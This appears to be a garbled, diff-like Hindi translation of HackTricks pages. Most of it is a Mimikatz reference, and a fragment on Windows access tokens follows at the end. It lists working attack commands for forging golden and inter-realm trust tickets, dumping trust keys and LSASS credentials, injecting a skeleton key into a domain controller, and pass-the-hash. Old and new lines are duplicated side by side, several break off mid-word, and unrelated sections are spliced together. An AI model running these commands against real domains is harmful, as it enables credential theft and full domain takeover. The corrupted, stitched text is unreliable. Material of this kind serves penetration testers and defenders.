mimikatz “kerberos::golden /admin:LukeSkywalker /id:1106 /domain:lab.adsecurity.org /sid:S-1-5-21-1473643419-774954089-2222329127 /target:adsmswin2k8r2.lab.adsecurity.org /rc4:d7e2b80507ea074ad59f152a1ba20458 /service:cifs /ptt” exit mimikatz “kerberos::golden /admin:LukeSkywalker /id:1106 /domain:lab.adsecurity.org /sid:S-1-5-21-1473643419-774954089-2222329127 /target:adsmswin2k8r2.lab.adsecurity.org /rc4:d7e2b80507ea074ad59f152a1ba20458 /service:cifs /ptt” exit
``` ```
#### [**विश्वास टिकट**](https://adsecurity.org/?p=1588) #### [**विश्वास पास**](https://adsecurity.org/?p=1588)
एक्टिव डायरेक्टरी ट्रस्ट पासवर्ड हैश निर्धारित होने के बाद, एक ट्रस्ट टिकट उत्पन्न किया जा सकता है। ट्रस्ट टिकट उन दोमेन के बीच साझा पासवर्ड का उपयोग करके बनाए जाते हैं जो एक-दूसरे पर विश्वास करते हैं।\ एक बार एक्टिव डायरेक्टरी ट्रस्ट पासवर्ड हैश निर्धारित हो जाता है, तो एक ट्रस्ट टिकट उत्पन्न किया जा सकता है। ट्रस्ट टिकट उन्हें उपयोग करके बनाए जाते हैं जो एक-दूसरे पर विश्वास करते हैं 2 डोमेन के बीच साझा पासवर्ड का उपयोग करके।\
[ट्रस्ट टिकट पर अधिक पृष्ठभूमि।](https://adsecurity.org/?p=1588) [विश्वास पास पर अधिक जानकारी।](https://adsecurity.org/?p=1588)
**ट्रस्ट पासवर्ड (ट्रस्ट कुंजी) डंप करना** **ट्रस्ट पासवर्ड (ट्रस्ट कुंजी) डंप करना**
``` ```
Mimikatz “privilege::debug” “lsadump::trust /patch” exit Mimikatz “privilege::debug” “lsadump::trust /patch” exit
``` ```
**Mimikatz का उपयोग करके एक जाली विश्वास प्रमाणपत्र (इंटर-वीटीजी) बनाएं** **Mimikatz का उपयोग करके एक जाली विश्वास टिकट (इंटर-रील्म TGT) बनाएं**
Mimikatz का उपयोग करके विश्वास प्रमाणपत्र को जाली बनाएं जिसमें कहा जाता है कि प्रमाणपत्र धारक AD वनस्पति में एक एंटरप्राइज व्यवस्थापक है (Mimikatz में विश्वास प्रमाणपत्रों के बीच में सिडीइतिहास, "सिडीएस" का उपयोग करके विश्वास प्रमाणपत्रों के बीच यात्रा करने के लिए, यह मेरा "योगदान" है)। इससे एक बाल डोमेन से मूल डोमेन के पूर्ण प्रशासनिक पहुंच संभव होती है। ध्यान दें कि यह खाता कहीं भी मौजूद नहीं होना चाहिए क्योंकि यह वास्तव में एक सोने का प्रमाणपत्र है जो विश्वास प्रमाणपत्र के बीच यात्रा करता है। विश्वास टिकट को जाली बनाएं जिसमें कहा गया है कि टिकट धारक AD वन्य (AD Forest) में एक एंटरप्राइज़ व्यवस्थापक है (SIDHistory, "sids" का लाभ उठाते हुए, Mimikatz में विश्वास करते हुए, मेरा "योगदान" Mimikatz में)। यह एक बच्चा डोमेन से माता-पिता डोमेन तक पूर्ण प्रशासनिक पहुंच सक्षम करता है। ध्यान दें कि यह खाता कहीं मौजूद नहीं होना चाहिए क्योंकि यह वास्तव में एक स्वर्ण टिकट है जो विश्वास पर है।
``` ```
Mimikatz “Kerberos::golden /domain:child.lab.adsecurity.org /sid:S-1-5-21-3677078698-724690114-1972670770 /sids:S-1-5-21-1581655573-3923512380-696647894-519 /rc4:49ed1653275f78846ff06de1a02386fd /user:DarthVader /service:krbtgt /target:lab.adsecurity.org /ticket:c:\temp\tickets\EA-ADSECLABCHILD.kirbi” exit Mimikatz “Kerberos::golden /domain:child.lab.adsecurity.org /sid:S-1-5-21-3677078698-724690114-1972670770 /sids:S-1-5-21-1581655573-3923512380-696647894-519 /rc4:49ed1653275f78846ff06de1a02386fd /user:DarthVader /service:krbtgt /target:lab.adsecurity.org /ticket:c:\temp\tickets\EA-ADSECLABCHILD.kirbi” exit
``` ```
विश्वास टिकट विशेष आवश्यक पैरामीटर: ### विश्वास टिकट विशेष आवश्यक पैरामीटर:
* \*\*/\*\*target - लक्षित डोमेन का FQDN। * \*\*/\*\*target लक्षित डोमेन का FQDN।
* \*\*/\*\*service - लक्षित डोमेन में चल रही केरबेरोस सेवा (krbtgt)। * \*\*/\*\*service लक्षित डोमेन में चल रही केरबेरोस सेवा (krbtgt)।
* \*\*/\*\*rc4 - सेवा केरबेरोस सेवा खाता (krbtgt) के लिए NTLM हैश। * \*\*/\*\*rc4 सेवा केरबेरोस स
* \*\*/\*\*ticket - बाद में उपयोग के लिए जाली टिकट फ़ाइल को सहेजने के लिए एक पथ और नाम प्रदान करें या /ptt का उपयोग करके स्मृति में स्वर्ण टिकट को तत्काल इंजेक्शन करें।
#### **और KERBEROS**
**KERBEROS::List** - उपयोगकर्ता मेमोरी में सभी उपयोगकर्ता टिकट (TGT और TGS) की सूची बनाएँ। कोई विशेष अधिकार आवश्यक नहीं है क्योंकि यह केवल वर्तमान उपयोगकर्ता के टिकट प्रदर्शित करता है।\
"क्लिस्ट" की कार्यान्वयनता के समान।
**KERBEROS::PTC** - कैश पास करें (NT6)\
Mac OS, Linux, BSD, Unix, आदि जैसे \*निक्स सिस्टम Kerberos क्रेडेंशियल कैश करते हैं। इस कैश डेटा को Mimikatz का उपयोग करके कॉपी किया जा सकता है। Kerberos टिकट्स को ccache फ़ाइल में इंजेक्शन करने के लिए भी उपयोगी है।
Mimikatz के kerberos::ptc का एक अच्छा उदाहरण है [PyKEK के साथ MS14-068 का शोषण](https://adsecurity.org/?p=676)। PyKEK एक ccache फ़ाइल उत्पन्न करता है जिसे kerberos::ptc का उपयोग करके Mimikatz में इंजेक्शन किया जा सकता है।
[![Mimikatz-PTC-PyKEK-ccacheFile](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-PTC-PyKEK-ccacheFile.jpg)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-PTC-PyKEK-ccacheFile.jpg)
**KERBEROS::PTT** - टिकट पास करें\
[Kerberos टिकट मिलने के बाद](https://adsecurity.org/?p=1667), इसे दूसरे सिस्टम में कॉपी किया जा सकता है और मौजूदा सत्र में पास किया जा सकता है, जिससे कोई संचार के बिना लॉगऑन की अनुकरण किया जा सकता है। कोई विशेष अधिकार आवश्यक नहीं है।\
SEKURLSA::PTH (पास-द-हैश) के समान।
* /filename - टिकट का फ़ाइलनाम (एकाधिक हो सकते हैं)
* /diretory - एक निर्देशिका पथ, जिसमें सभी .kirbi फ़ाइलें होंगी, इंजेक्शन किया जाएगा।
[![KerberosUnConstrainedDelegation-Mimikatz-PTT-LS-Ticket2](https://adsecurity.org/wp-content/uploads/2015/09/KerberosUnConstrainedDelegation-Mimikatz-PTT-LS-Ticket2.png)](https://adsecurity.org/wp-content/uploads/2015/09/KerberosUnConstrainedDelegation-Mimikatz-PTT-LS-Ticket2.png)
**KERBEROS::Purge** - सभी Kerberos टिकट हटाएं\
"क्लिस्ट पर्ज" की कार्यान्वयनता के समान। टिकट (PTC, PTT, आदि) को पास करने से पहले इस कमांड को चलाएं ताकि सही उपयोगकर्ता संदर्भ का उपयोग किया जा सके।
[![Mimikatz-Kerberos-Purge](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-Purge.png)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-Purge.png)
**KERBEROS::TGT** - वर्तमान उपयोगकर्ता के लिए वर्तमान TGT प्राप्त करें।
[![Mimikatz-Kerberos-TGT](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-TGT.png)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-TGT.png)
### LSADUMP
**LSADUMP**::**DCShadow** - वर्तमान मशीन को DC के रूप में सेट करें ताकि DC के भीतर नए ऑब्जेक्ट बनाने की क्षमता हो (स्थायी विधि)।\
इसके लिए पूर्ण AD व्यवस्थापक अधिकार या KRBTGT पासवर्ड हैश की आवश्यकता होती है।\
DCShadow सामयिक रूप से कंप्यूटर को प्रतिरूपण के उद्देश्य के लिए "DC" के रूप में सेट करता है:
* AD वनस्पति के वनस्पति में 2 ऑब्जेक्ट बनाएं।
* उपयोग किए जाने वाले कंप्यूटर के SPN में "GC" (ग्लोबल कैटलॉग) और "E3514235-4B06-11D1-AB04-00C04FC2DCD2" (AD रिप्लिकेशन) शामिल करें। [ADSecurity SPN अनुभाग](https://adsecurity.org/?page\_id=183) में Kerberos सेवा प्रमुख नामों पर अधिक जानकारी।
* DrsReplicaAdd और KCC के माध्यम से अद्यतनों को DCs को पुश करें।
* वनस्पति में बनाए गए ऑब्जेक्ट हटाएं।
**LSADUMP::DCSync** - एक DC से एक ऑब्जेक्ट को समकालिक करने के लिए DC से सिंक्रनाइज़ करें (खाता के
``` ```
mimikatz lsadump::lsa /inject exit mimikatz lsadump::lsa /inject exit
``` ```
**LSADUMP::NetSync** **LSADUMP::NetSync**
NetSync एक सरल तरीका प्रदान करता है जिसके माध्यम से एक डीसी कंप्यूटर खाता पासवर्ड डेटा का उपयोग करके एक डोमेन कंट्रोलर की भूमिका में छवि बनाने के लिए सिल्वर टिकट का उपयोग करके लक्षित खाता की जानकारी, सहित पासवर्ड डेटा, को डीसीसिंक करता है। NetSync एक DC कंप्यूटर खाता पासवर्ड डेटा का उपयोग करने का एक सरल तरीका प्रदान करता है जिससे एक Silver Ticket के माध्यम से डोमेन कंट्रोलर का अनुकरण किया जा सकता है और टारगेट खाते की जानकारी जिसमें पासवर्ड डेटा शामिल है, DCSync किया जा सकता है।
**LSADUMP::SAM** - SAM प्रविष्टियों (रजिस्ट्री या हाइव से) को डिक्रिप्ट करने के लिए SysKey प्राप्त करें। SAM विकल्प स्थानीय सुरक्षा खाता प्रबंधक (SAM) डेटाबेस से कनेक्ट करता है और स्थानीय खातों के लिए क्रेडेंशियल्स को डंप करता है। **LSADUMP::SAM** SAM प्रविष्टियों (रजिस्ट्री या हाइव से) को डिक्रिप्ट करने के लिए SysKey प्राप्त करें। SAM विकल्प स्थानीय सुरक्षा खाता प्रबंधक (SAM) डेटाबेस से कनेक्ट करता है और स्थानीय खातों के लिए क्रेडेंशियल को डंप करता है।
**LSADUMP::Secrets** - SysKey प्राप्त करें ताकि SECRETS प्रविष्टियों (रजिस्ट्री या हाइव से) को डिक्रिप्ट किया जा सके **LSADUMP::Secrets** सीक्रेट्स प्रविष्टियों (रजिस्ट्री या हाइव से) को डिक्रिप्ट करने के लिए SysKey प्राप्त करें।
**LSADUMP::SetNTLM** - एक उपयोगकर्ता के लिए एक नया पासवर्ड/NTLM सेट करने के लिए सर्वर से अनुरोध करें। **LSADUMP::SetNTLM** एक उपयोगकर्ता के लिए एक नया पासवर्ड/NTLM सेट करने के लिए सर्वर से अनुरोध करें।
[**LSADUMP::Trust**](https://adsecurity.org/?p=1588) - LSA सर्वर से विश्वास प्रमाणन जानकारी (सामान्य या फ्लाई पर पैच) प्राप्त करने के लिए LSA सर्वर से पूछें। [**LSADUMP::Trust**](https://adsecurity.org/?p=1588) LSA सर्वर से विश्वास स्वीकृति जानकारी (सामान्य या पैच के साथ) प्राप्त करने के लिए अनुरोध करें।
### MISC ### MISC
[**MISC::Skeleton**](https://adsecurity.org/?p=1275) - डोमेन कंट्रोलर पर LSASS प्रक्रिया में स्केलेटन कुंजी इंजेक्ट करें। [**MISC::Skeleton**](https://adsecurity.org/?p=1275) डोमेन कंट्रोलर पर LSASS प्रक्रिया में स्केलेटन कुंजी इंजेक्ट करें।
``` ```
"privilege::debug" "misc::skeleton" "privilege::debug" "misc::skeleton"
``` ```
### विशेषाधिकार ### विशेषाधिकार
**PRIVILEGE::Backup** - बैकअप विशेषाधिकार प्राप्त करें। डीबग अधिकारों की आवश्यकता होती है। **PRIVILEGE::Backup** - बैकअप विशेषाधिकार/अधिकार प्राप्त करें। Debug अधिकारों की आवश्यकता है।
**PRIVILEGE::Debug** - डीबग अधिकार प्राप्त करें (यह या स्थानिक सिस्टम अधिकारों की आवश्यकता होती है बहुत सारे Mimikatz कमांड के लिए)। **PRIVILEGE::Debug** - Debug अधिकार प्राप्त करें (यह या स्थानीय सिस्टम अधिकारों की आवश्यकता होती है बहुत से Mimikatz कमांड्स के लिए)।
### SEKURLSA ### SEKURLSA
**SEKURLSA::Credman** - क्रेडेंशियल प्रबंधक की सूची देखें **SEKURLSA::Credman** - क्रेडेंशियल्स मैनेजर की सूची देखें।
**SEKURLSA::Ekeys** - **करबेरोस एन्क्रिप्शन कुंजी** की सूची देखें **SEKURLSA::Ekeys** - **कर्बेरोस एन्क्रिप्शन कुंजियों** की सूची देखें।
**SEKURLSA::Kerberos** - सभी प्रमाणित उपयोगकर्ताओं (सेवाओं और कंप्यूटर खाता सहित) के लिए करबेरोस प्रमाणपत्रों की सूची देखें **SEKURLSA::Kerberos** - सभी प्रमाणित उपयोगकर्ताओं के लिए कर्बेरोस प्रमाणपत्रों की सूची देखें (सेवाएं और कंप्यूटर खाता सहित)।
**SEKURLSA::Krbtgt** - डोमेन करबेरोस सेवा खाता (KRBTGT) पासवर्ड डेटा प्राप्त करें **SEKURLSA::Krbtgt** - डोमेन कर्बेरोस सेवा खाता (KRBTGT) पासवर्ड डेटा प्राप्त करें।
**SEKURLSA::SSP** - SSP प्रमाणपत्रों की सूची देखे **SEKURLSA::SSP** - SSP प्रमाणपत्रों की सूची दें।
**SEKURLSA::Wdigest** - WDigest प्रमाणपत्रों की सूची देखे **SEKURLSA::Wdigest** - WDigest प्रमाणपत्रों की सूची दें।
**SEKURLSA::LogonPasswords** - सभी उपलब्ध प्रदाता प्रमाणपत्रों की सूची देखें। यह आमतौर पर हाल ही में लॉग इन किए गए उपयोगकर्ता और कंप्यूटर प्रमाणपत्रों को दिखाता है। **SEKURLSA::LogonPasswords** - सभी उपलब्ध प्रदाता प्रमाणपत्रों की सूची देता है। यह आम तौर पर हाल ही में लॉग इन करने वाले उपयोगकर्ता और कंप्यूटर प्रमाणपत्रों को दिखाता है।
* वर्तमान में लॉग इन किए गए (या हाल ही में लॉग इन किए गए) खातों के लिए LSASS में पासवर्ड डेटा डंप करता है, साथ ही उपयोगकर्ता प्रमाणों के संदर्भ में चल रही सेवाएं भी शामिल होती हैं। * वर्तमान में लॉग इन किए गए (या हाल ही में लॉग इन किए गए) खातों के लिए LSASS में पासवर्ड डेटा डंप करता है, साथ ही उपयोगकर्ता प्रमाणपत्रों के संदर्भ में उपयोगकर्ता प्रमाणपत्रों के संदर्भ में चल रही सेवाएं।
* खाता पासवर्ड को प्रतिबिंबी तरीके से मेमोरी में संग्रहीत किया जाता है। यदि वे मेमोरी में हैं (Windows 8.1/Windows Server 2012 R2 से पहले थे), तो वे प्रदर्शित किए जाते हैं। Windows 8.1/Windows Server 2012 R2 आमतौर पर अधिकांश मामलों में खाता पासवर्ड को इस तरीके से संग्रहीत नहीं करता है। KB2871997 इस सुरक्षा क्षमता को Windows 7, Windows 8, Windows Server 2008R2 और Windows Server 2012 में लागू करता है, हालांकि KB2871997 लागू करने के बाद कंप्यूटर को अतिरिक्त कॉन्फ़िगरेशन की आवश्यकता होती है। * खाता पासवर्ड को एक पलटवार तरीके में मेमोरी में संग्रहित किया जाता है। यदि वे मेमोरी में हैं (Windows 8.1/Windows Server 2012 R2 से पहले थे), तो वे प्रदर्शित किए जाते हैं। Windows 8.1/Windows Server 2012 R2 अधिकांश मामलों में खाता पासवर्ड को इस तरह से संग्रहित नहीं करता है। KB2871997 "बैक-पोर्ट्स" इस सुरक्षा क्षमता को Windows 7, Windows 8, Windows Server 2008R2, और Windows Server 2012 में लागू करने के बाद, कंप्यूटर को अतिरिक्त विन्यास की आवश्यकता होती है।
* व्यवस्थापक पहुंच (डीबग अधिकारों के साथ) या स्थानिक सिस्टम अधिकारों की आवश्यकता होती ह * प्रशासक एक्सेस (डीबग अधिकारों के साथ) या स्थानीय सिस्टम अधिकारों की आवश्यकता है
**SEKURLSA::Minidump** - LSASS मिनीडंप प्रक्रिया संदर्भ में स्विच करें (lsass डंप पढ़ें) **SEKURLSA::Minidump** - LSASS मिनीडंप प्रक्रिया संदर्भ में स्विच करें (lsass डंप पढ़ें)
**SEKURLSA::Pth** - पास-द-हैश और ओवर-पास-द-हैश (अर्थात पासवर्ड की कुंजी पास करें)। **SEKURLSA::Pth** - पास-द-हैश और ओवर-पास-द-हैश (जिसे पास द की कुंजी कहा जाता है)।
_Mimikatz प्रसिद्ध आपरेशन 'पास-द-हैश' को करने के लिए कार्य कर सकता है, जिसमें उपयोगकर्ता के पासवर्ड के NTLM हैश के साथ दूसरे प्रमाणों के तहत प्रक्रिया चलाई जाती है, इसके बजाय असली पासवर्ड। इसके लिए, यह एक नकली पहचान के साथ एक प्रक्रिया शुरू करता है, फिर नकली जानकारी (नकली पासवर्ड के NTLM हैश) को असली जानकारी (असली पासवर्ड के NTLM हैश) के साथ बदलता है।_ _Mimikatz एक प्रक्रिया को दौर अन्य प्रमाणों के तहत चलाने के लिए 'पास-द-हैश' नामक विख्यात ऑपरेशन को कर सकता है जिसमें उपयोगकर्ता के पासवर्ड के NTLM हैश के साथ एक प्रक्रिया चलाता है, इसके असली पासवर्ड के बजाय। इसके लिए, यह एक प्रक्रिया एक नकली पहचान के साथ शुरू करता है, फिर नकली जानकारी (नकली पासवर्ड का NTLM हैश) को असली जानकारी (वास्तविक पासवर्ड का NTLM हैश) से बदलता है।_
* /user - आप जिस उपयोगकर्ता की प्रतिष्ठा करना चाहते हैं, ध्यान दें कि विशेष रूप से इस प्रसिद्ध खाते के लिए व्यवस्थापक नाम नहीं है। * /user - आप जिस उपयोगकर्ता का अनुकरण करना चाहते हैं, ध्यान रखें कि व्यवस्थापक इस प्रसिद्ध खाते के लिए एकमात्र नाम नहीं है।
* /domain - पूर्ण नामित डोमेन नाम - डोमेन के बिना या स्थानिक उपयोगकर्ता/व्यवस्थापक के मामले में, कंप्यूटर या सर्वर नाम, कार्यसमूह या कुछ भी उपयोग करें। * /domain - पूरी तरह से योग्य डोमेन नाम - डोमेन के बिना या स्थानीय उपयोगकर्ता/व्यवस्थापक के मामले में, कंप्यूटर या सर्वर नाम, कार्यसमूह या कुछ भी उपयोग करें।
* /rc4 या /ntlm - वैकल्पिक - उपयोगकर्ता के पासवर्ड की RC4 कुंजी / NTLM हैश। * /rc4 या /ntlm - वैकल्पिक - उपयोगकर्ता के पासवर्ड की RC4 कुंजी / NTLM हैश।
* /run - वैकल्पिक - चलाने के लिए कमांड लाइन - डिफ़ॉल्ट है: शेल के लिए cmd। * /run - वैकल्पिक - रन करने के लिए कमांड लाइन - डिफ़ॉल्ट है: एक शैल रखने के लिए cmd।
[![Mimikatz-Sekurlsa-PTH](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-PTH.jpg)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-PTH.jpg) [![Mimikatz-Sekurlsa-PTH](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-PTH.jpg)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-PTH.jpg)
**SEKURLSA::Tickets** - हाल ही में प्रमाणित उपयोगकर्ताओं के लिए सभी उपलब्ध केरबेरोस टिकट देखें, जिनमें उपयोगकर्ता खाता और स्थानीय कंप्यूटर के AD कंप्यूटर खाता के संदर्भ में सेवाएं चल रही होती हैं।\ **SEKURLSA::Tickets** - हाल ही में प्रमाणित किए गए सभी उपयोगकर्ताओं के लिए सभी उपलब्ध कर्बेरोस टिकटों की सूची देता है, जिसमें उपयोगकर्ता खाता और स्थानीय कंप्यूटर का AD कंप्यूटर खाता सहित सेवाएं उपयोगकर्ता खाते के संदर्भ में चल रही होती हैं।
केरबेर
### वॉल्ट
`mimikatz.exe "privilege::debug" "token::elevate" "vault::cred /patch" "exit"` - निर्धारित कार्यों के पासवर्ड प्राप्त करें * /export - वैकल्पिक - टिकट .kirbi फ़ाइलों में निर्यात किए जाते हैं। वे उपयोगकर्ता के LUID और समूह संख्या से शुरू होते हैं (0 = TGS, 1 = क्लाइंट टिकट(?) और 2 = TGT)
\ LSASS से क्रेडेंशियल डंपिंग के समान, सेकुरल्सा मॉड्यूल का उपयोग करके, एक हमलावर एक सिस्टम पर मेमोरी में सभी कर्बेरोस टिकट डेटा प्राप्त कर सकता है, जिसमें एक व्यवस्थापक या सेवा के टिकट शामिल हैं।
\ यह अत्यंत उपयोगी है अगर एक हमलावर ने एक वेब सर्वर को हाक कर लिया है जिसे कर्बेरोस अनुवहन के लिए कॉन्फ़िगर किया गया है जिसे उपयोगकर्ता एक बैकएंड SQL सर्वर के साथ एक्सेस करते हैं। इससे एक हमलावर को उस सर्वर पर मेमोरी में सभी उपयोगकर्ता टिकट को कैप्चर और पुनः उपयोग करने की संभावना होती है।
\\
<details> "kerberos::tickets" mimikatz कमांड वर्तमान में लॉग इन किए गए उपयोगकर्ता के कर्बेरोस टिकट डंप करता है और उच्च अधिकारों की आवश्यकता नहीं है। सुरक्षित मेमोरी से पढ़ने की क्षमता का लाभ उठाते हुए, सिस्टम पर सभी कर्बेरोस टिकट डंप किए जा सकते हैं।
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> कमांड: _mimikatz sekurlsa::tickets exit_
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने की अनुमति** चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * सिस्टम पर सभी प्रमाणित कर्बेरोस टिकट डंप करता है।
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एकल [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह देखें * प्रशासक एक्सेस (डीबग के साथ) या स्थानीय सिस्टम अधिकारों की आवश्यकता है।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें,** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **में PR जमा करके।**
</details> ### **SID**
Mimikatz SID मॉड्यूल MISC::AddSID को बदलता है। Ntds सेवा को पैच करने के लिए SID::Patch का उपयोग करें।
**SID::add** - एक ऑब्जेक्ट के SIDHistory में एक SID जोड़ें।
[![Mimikatz-SID-add](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-add.png)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-SID-add.png)
**SID::modify** - एक ऑब्ज

File diff suppressed because one or more lines are too long

View file

@ -1,22 +1,22 @@
# पहुंच टोकन # एक्सेस टोकन्स
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family) * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें**. * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स को** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **में PR जमा करके साझा करें**. * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को**.
</details> </details>
## पहुंच टोकन ## एक्सेस टोकन्स
प्रत्येक **उपयोगकर्ता जिसने सिस्टम पर लॉग इन किया है**, उसके पास उस लॉगइन सत्र के लिए सुरक्षा सूचना के साथ एक पहुंच टोकन होता है। सिस्टम उपयोगकर्ता लॉग इन करते समय एक पहुंच टोकन बनाता है। **प्रत्येक प्रक्रिया** जो उपयोगकर्ता के नाम पर **चलाई जाती है**, उसके पास एक पहुंच टोकन की प्रतिलिपि होती है। टोकन उपयोगकर्ता को पहचानता है, उपयोगकर्ता के समूहों को पहचानता है, और उपयोगकर्ता की विशेषाधिकारों को पहचानता है। टोकन में एक लॉगइन SID (सुरक्षा पहचानक) भी होता है जो वर्तमान लॉगइन सत्र की पहचान करता है। **प्रत्येक उपयोगकर्ता** जो सिस्टम **में लॉग इन होता है, उसके पास सुरक्षा सूचना के साथ एक्सेस टोकन होता है**। सिस्टम एक एक्सेस टोकन बनाता है जब उपयोगकर्ता लॉग इन करता है। **उपयोगकर्ता के प्रतिनिधित्व में किये गए प्रत्येक प्रक्रिया के पास एक्सेस टोकन की एक प्रति होती है**। टोकन उपयोगकर्ता, उपयोगकर्ता के समूह, और उपयोगकर्ता की विशेषाधिकारों की पहचान करता है। एक टोकन में वर्तमान लॉग इन सत्र की पहचान करने वाला लॉग ऑन एसआईडी (सुरक्षा पहचानकर्ता) भी होता है।
आप इस सूचना को `whoami /all` को निष्पादित करके देख सकते हैं आप इस सूचना को देख सकते हैं `whoami /all` का निष्पादन करके
``` ```
whoami /all whoami /all
@ -60,58 +60,34 @@ SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled SeTimeZonePrivilege Change the time zone Disabled
``` ```
या तो _प्रक्रिया एक्सप्लोरर_ का उपयोग करके साइंटर्नल्स से (प्रक्रिया का चयन करें और "सुरक्षा" टैब तक पहुंचें): या _प्रक्रिया एक्सप्लोरर_ से सिसटर्नल्स (प्रक्रिया का चयन करें और "सुरक्षा" टैब तक पहुंचें):
![](<../../.gitbook/assets/image (321).png>) ![](<../../.gitbook/assets/image (321).png>)
### स्थानीय प्रशासक ### स्थानीय प्रशासक
